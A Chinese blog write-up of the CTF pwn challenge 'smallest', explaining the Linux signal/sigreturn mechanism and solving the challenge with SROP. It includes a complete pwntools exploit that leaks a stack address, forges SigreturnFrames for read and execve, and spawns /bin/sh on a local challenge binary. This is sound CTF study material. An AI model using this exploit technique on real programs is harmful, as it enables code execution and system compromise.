首页 > 其他分享 >SROP-smallest

SROP-smallest

时间:2023-07-26 12:22:31浏览次数:50  
标签:调用 read signal 地址 smallest rax 进程 SROP

第一次打srop,题目来源是https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/stackoverflow/srop/2016-360%E6%98%A5%E7%A7%8B%E6%9D%AF-srop/smallest

这个原理是从hollk师傅的博客中搬来的https://hollk.blog.csdn.net/article/details/107512670?spm=1001.2014.3001.5502

signal机制
signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。一般分为三大步:(出自wiki和yichen)

① 内核向某个进程发送signal机制,该进程会被暂时挂起,进入内核态
② 内核会为该进程保存相应的上下文,跳转到之前注册好的signal handler中处理signal
③ signal返回
④ 内核为进程恢复之前保留的上下文,恢复进程的执行

内核在保存进程相应上下文阶段主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。此时栈的结构如下图所示,我们称 ucontext 以及 siginfo 这一段为 Signal Frame。需要注意的是,这一部分是在用户进程的地址空间的。之后会跳转到注册过的 signal handler 中处理相应的 signal。因此,当 signal handler 执行完之后,就会执行 sigreturn 代码。

先看保护:

只开了nx,栈不可执行。

然后看ida

相当于read(0,rsp,0x400)

由于最后retn相当于pop rip,所以会将我们写进去的内容直接当地址去解析,因此可以反复执行程序(每执行一次rsp会向高地址增长 且栈上数据不会被清除,在栈中连续布置地址即可)。

看到syscall, 我最先想到的是通过ret2syscall,将系统调用号(rax)改为0x3b,rdi是'/bin/sh',rsi是0,rdx是0,直接执行system('/bin/sh'),无法更改rdx值,所以此路不通。

而srop简单来说,就是能够控制所有寄存器的值,所以:

  1. 泄露栈地址:read执行完后会将读入的字节数返回给rax,可以调用write,read等函数,我们需要手动写入1字节的内容,将rax改为1,调用write来泄露栈地址,从而获取栈地址。
  2. 调用read:先将rax改为15来调用sigreturn,再修改寄存器rax=0,rdi=0,rsi=泄露栈地址,rdx=读入大小,rsp=泄露栈地址,rsi=syscall来调用read
  3. 写入binsh并调用execve:同2,但是我将binsh布置在了payload的后方,需要计算泄露的栈地址与它的偏移。

exp:

from pwn import *
from LibcSearcher import*
context(os='linux', arch='amd64', log_level='debug') 
p = process('./pwn')
#p = remote('node4.anna.nssctf.cn',28099)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')

#gdb.attach(p)
payload1=p64(0x4000b0)*3
p.send(payload1)

payload2=b'\xb3'
pause()
p.send(payload2)
leak_stack=u64(p.recv()[8:16])
print('<<leak_addr=',hex(leak_stack))


read = SigreturnFrame()
read.rax = constants.SYS_read
read.rdi = 0
read.rsi = leak_stack
read.rdx = 0x400
read.rsp = leak_stack
read.rip = 0x4000be
payload3  = p64(0x4000b0) + p64(0x4000be)+ bytes(read)
pause()
p.send(payload3)
pause()
p.send(payload3[8:8+15])#修改rax为15 


execve = SigreturnFrame()
execve.rax = constants.SYS_execve
execve.rdi = leak_stack + 0x108 #binsh地址
execve.rsi = 0x0
execve.rdx = 0x0
execve.rsp = leak_stack 
execve.rip = 0x4000be


payload4=p64(0x4000b0)+p64(0x4000be)+bytes(execve)
print(len(payload4))
payload4+=b'/bin/sh\x00'
pause()
p.send(payload4)
pause()
gdb.attach(p)
p.send(payload4[8:8+15])#修改rax为15
p.interactive()

 注意点:python3要将execve和read转成bytes

标签:调用,read,signal,地址,smallest,rax,进程,SROP
From: https://www.cnblogs.com/M4rg4tr01d/p/17580950.html

相关文章

  • [ARC162D] Smallest Vertices
    [ARC162D]SmallestVerticesAtcoder:[ARC162D]SmallestVertices洛谷:[ARC162D]SmallestVerticesProblem在本问题中,当我们提到有根有向树时,我们指的是所有边都指向从根到叶子的有根树。给定一个使得其总和为\(N-1\)的非负整数序列\(d=(d_1,d_2,\ldots,d_N)\)。对于带编......
  • Largest-Smallest-Cyclic-Shift题解
    题目链接本题码量不大,但是事实上是一道极其难想的思维题。题目描述你有\(a\)个a,\(b\)个b,\(c\)个c。要求用这\(a+b+c\)个字母拼接成一个字符串,使得这个字符串的最小表示法在所有能拼成的字符串中最大。补充:最小表示法,将一个字符串的最后一个字符放到首位,重复这个操作,......
  • leetcode -- Kth Smallest Element in a BST -- 简单重点
    https://leetcode.com/problems/kth-smallest-element-in-a-bst/这里注意BST的leftsubtree所有**node都要小于root,rightsubtree所有node都要大于**root。没有等于,并且是所有node思路1非递归用stack用inorder的模板就行classSolution(object):definorder(self,root,......
  • Educational Codeforces Round 9-C. The Smallest String Concatenation(字符串排序)
    原题链接C.TheSmallestStringConcatenationtimelimitpertestmemorylimitpertestinputoutputn strings a1, a2, ..., an.You'dliketoconcatenatethemtogetherinsomeordersuchthattheresultings......
  • leetcode 378. Kth Smallest Element in a Sorted Matrix
    Givenanxnmatrixwhereeachoftherowsandcolumnsaresortedinascendingorder,findthekthsmallestelementinthematrix.Notethatitisthekthsmallestelementinthesortedorder,notthekthdistinctelement.Example:matrix=[[1,5,9......
  • [LeetCode] 1334. Find the City With the Smallest Number of Neighbors at a Thresh
    Thereare n citiesnumberedfrom 0 to n-1.Giventhearray edges where edges[i]=[fromi,toi,weighti] representsabidirectionalandweightededge......
  • Find the smallest integer in the array
    InstructionsGivenanarrayofintegersyoursolutionshouldfindthesmallestinteger.Forexample:Given[34,15,88,2]yoursolutionwillreturn2Given......
  • 230. Kth Smallest Element in a BST[Medium]
    230.KthSmallestElementinaBSTGiventherootofabinarysearchtree,andanintegerk,returnthekthsmallestvalue(1-indexed)ofallthevaluesofthe......
  • Kth Smallest Element in a Sorted Matrix
    classSolution{//14ms,fasterthan55.67%publicintkthSmallest(int[][]matrix,intk){intm=matrix.le......
  • [LeetCode] 1061. Lexicographically Smallest Equivalent String
    Youaregiventwostringsofthesamelength s1 and s2 andastring baseStr.Wesay s1[i] and s2[i] areequivalentcharacters.Forexample,if s1=......